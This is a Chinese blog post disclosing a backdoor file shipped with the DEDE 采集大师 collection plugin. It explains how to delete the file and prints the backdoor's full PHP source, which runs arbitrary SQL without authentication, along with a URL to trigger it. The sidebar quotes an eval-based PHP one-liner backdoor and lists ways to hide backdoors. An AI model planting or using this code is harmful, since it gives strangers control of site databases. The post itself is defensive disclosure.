php采集有后门,DEDE采集大师官方留后门的删除办法

最新推荐文章于 2021-03-20 03:33:52 发布
最新推荐文章于 2021-03-20 03:33:52 发布
阅读量170 收藏
点赞数
文章标签: php采集有后门

说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法:

http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo

输入以上网址,即可打开后门界面。

说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下:

require_once(dirname(__FILE__)."/../include/common.inc.php");

if(emptyempty($dopost))

{

$dopost = "";

}

if($dopost=="rename")

{

if(rename('dedesql.query.php','arc.sqlquery.class.php')){

echo "成功!";

}else{

echo "失败!";

}

exit();

}

if($dopost=="viewinfo")

{

if(emptyempty($tablename))

{

echo "没有指定表名!";

}

else

{

$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);

$dsql->Execute('me');

$row2 = $dsql->GetArray('me',MYSQL_BOTH);

$ctinfo = $row2[1];

echo "

".trim($ctinfo)."";

}

exit();

}

if($dopost=="index")

{

require_once(DEDEINC.'/arc.partview.class.php');

$envs = $_sys_globals = array();

$envs['aid'] = 0;

$pv = new PartView();

$row = $pv->dsql->GetOne('Select * From `#@__homepageset`');

$templet = str_replace("{style}",$cfg_df_style,$row['templet']);

$homeFile = dirname(__FILE__).'/'.$row['position'];

$homeFile = str_replace("//","/",str_replace("\\","/",$homeFile));

$fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置");

fclose($fp);

$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;

$pv->SetTemplet($tpl);

$pv->SaveToHtml($homeFile);

$pv->Close();

echo "成功更新首页!";

exit();

}

else if($dopost=="query")

{

$sqlquery = trim(stripslashes($sqlquery));

if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))

{

echo "删除'数据表'或'数据库'的语句不允许在这里执行。";

exit();

}

if(eregi("^select ",$sqlquery))

{

$dsql->SetQuery($sqlquery);

$dsql->Execute();

if($dsql->GetTotalRow()<=0)

{

echo "运行SQL:{$sqlquery},无返回记录!";

}

else

{

echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!";

}

$j = 0;

while($row = $dsql->GetArray())

{

$j++;

if($j>100)

{

break;

}

echo "

";

echo "记录:$j";

echo "

";

foreach($row as $k=>$v)

{

echo "{$k}:{$v}
\r\n";

}

}

exit();

}

if($querytype==2)

{

$sqlquery = str_replace("\r","",$sqlquery);

$sqls = split(";[ \t]{0,}\n",$sqlquery);

$nerrCode = "";$i=0;

foreach($sqls as $q)

{

$q = trim($q);

if($q=="")

{

continue;

}

$dsql->ExecuteNoneQuery($q);

$errCode = trim($dsql->GetError());

if($errCode=="")

{

$i++;

}

else

{

$nerrCode .= "执行: $q 出错,错误提示:".$errCode."
";

}

}

echo "成功执行{$i}个SQL语句!
";

echo $nerrCode;

}

else

{

$dsql->ExecuteNoneQuery($sqlquery);

$nerrCode = trim($dsql->GetError());

echo "成功执行1个SQL语句!
";

echo $nerrCode;

}

exit();

}

if($dopost=="view")

{

;echo '

SQL命令行工具
SQL命令运行器: 数据备份

| 数据还原

系统的表信息:

';

$dsql->SetQuery("Show Tables");

$dsql->Execute('t');

while($row = $dsql->GetArray('t',MYSQL_BOTH))

{

$dsql->SetQuery("Select count(*) From ".$row[0]);

$dsql->Execute('n');

$row2 = $dsql->GetArray('n',MYSQL_BOTH);

$dd = $row2[0];

echo " ".$row[0]."(".$dd.")\r\n";

}

;echo '

 
返回信息:
运行SQL命令行:

单行命令(支持简单查询)

多行命令

 

';}

?>

火焰旁的炼金术士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详细分析PHP源代码后门事件及其供应链安全启示
smellycat000的专栏
03-30 2003
聚焦源代码安全,网罗国内外最新资讯!专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根...
php源码查后门,某一次排查源码后门的过程
weixin_39762856的博客
03-10 4368
源码藏后门这种事情,屡见不鲜了。文件包含,文件调用,拼接,大小马,htaccess文件做手脚等等………不过今天我就遇到个奇葩,藏了后门还不承认,非说是程序自带的。给大家看看程序结构先。我检查了我所知道的一切后门方式。也用扫描器查找了一般,以为安全了直接上服务器部署好了,域名解析开始使用。第二天,莫名其妙登录日志有其他人了。也没太在意,觉得应该是自己登录路径和密码设的不够复杂,被人试出来了。改了一下...
think php 后门,ThinkPHP后门技巧
weixin_29831325的博客
03-20 396
原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操作过程。thinkphp的I函数,是其处理输入的函数,一般用法为I(‘get.id‘)——从$_GET数组中取出键为id的值,post、cookie类似。le...
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 277
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
DEDE采集大师官方后门删除办法
10-28
说实话,会故意后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。
中国站长站 For Dede4.0 采集规则
10-30
### 中国站长站 For Dede4.0 采集规则详解 #### 一、概述 本文档将详细介绍如何针对中国站长站使用DedeCMS v4.0版本进行网站内容的自动采集,包括设置采集规则的基本步骤与注意事项。对于那些希望利用自动化工具来...
dede采集插件免费下载自动采集发布
02-14
dede采集插件,免费dede采集插件,免费下载,全自动采集伪原创发布推送插件
dede采集https
11-02
改动的文件有4个,由于改动地方有好几处,推荐用下载文件覆盖的方式,避免引起不必要的错误 提示:覆盖之前建议先备份你的这4个PHP文件后再覆盖我的 /include/dedecollection.class.php /include/dedecollection....
我今天终于知道后门在代码上是如何实现的
wjp_116的专栏
03-23 5451
我们开发的程序是要在生产一线使用的,这种软件不但要考虑功能,还要考虑到使用者的知识水平和个人素质。总有人喜欢不按规程操作,把这些问题交给管理者去规范是个很挠头的事情。这样只能在代码上进行处理了。比如不能在通信过程中退出程序,否则会造成通信数据的不完整性。而如果有时我们的程序有问题时又确实要在那种情况下退出,这样就需要在代码中增加一部分,只有点击了特定的按钮顺序才能退出程序。当然这部分代码是在我们技
网站发现后门***该怎么处理
weixin_33907511的博客
03-12 2919
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站***的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。 首先我...
如何检测网站后门
lllljz的专栏
01-26 1万+
很多时候我们无法保障下载的网站源码是否有后门,因此需要检测一下,参考了很多方法,觉得用360网站安全检测是最快捷的方式了。 网址: http://safe.webscan.360.cn/
在某网站下的源码里清除的后门代码
weixin_34332905的博客
08-07 699
今天朋友传来一网站源码,说是网上下载的,我就简单的看了看,发现index_server_list.asp里存在后门代码,具体的代码如下,各位相信百度也能找到不少同类的站点,<%msco="%%%% fi dne )""tenzzba""(tseuqer lave neht ""ten""= )""zzba""(tseuqer fI%%%%%"execute(Unlin(...
sql解封代码(有后门,自行清除)
Yatere的天平秤
04-25 1310
if(@@version like 'Microsoft SQL Server  2000%')use master;elseexec sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;gocreate procedure dbo.sp_dropextendedproc @functname nvarchar(517) -- name of function as -- If we're in a transactio
一种奇特的DEDE隐藏后门办法
滴水石穿
03-11 443
• 2013/06/28作者:admin 一种奇特的DEDE隐藏后门办法 单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? 无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件...
DedeCMS 5.7 后门漏洞
weixin_33895475的博客
03-21 589
简要描述: DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码 详细说明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input')); 漏洞证明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input'...
DEDECMS安装之后需要做的事情!DEDECMS去除所有自带后门和 漏洞的方法
热门推荐
____
04-20 1万+
Dedecms安全步骤,安装之后的操作   1 将文件夹dede改名为其他,比如 /fukedh.com/   2 搜索ad.dedecms.com,文件D:\WebSite\fukedh.com\www\gzadmin\templets\login_ad.htm 删除如下这一段: /dedecms/loginad..js">-->              3 继续搜
/DedeCMS/dede/file_manage_control.php
最新发布
05-27
`/DedeCMS/dede/file_manage_control.php` 是织梦(DedeCMS) 的一个文件管理控制脚本,用于管理网站中的文件和目录。通过该脚本,网站管理员可以上传、下载、删除、编辑和移动文件,以及创建、删除和移动目录等操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值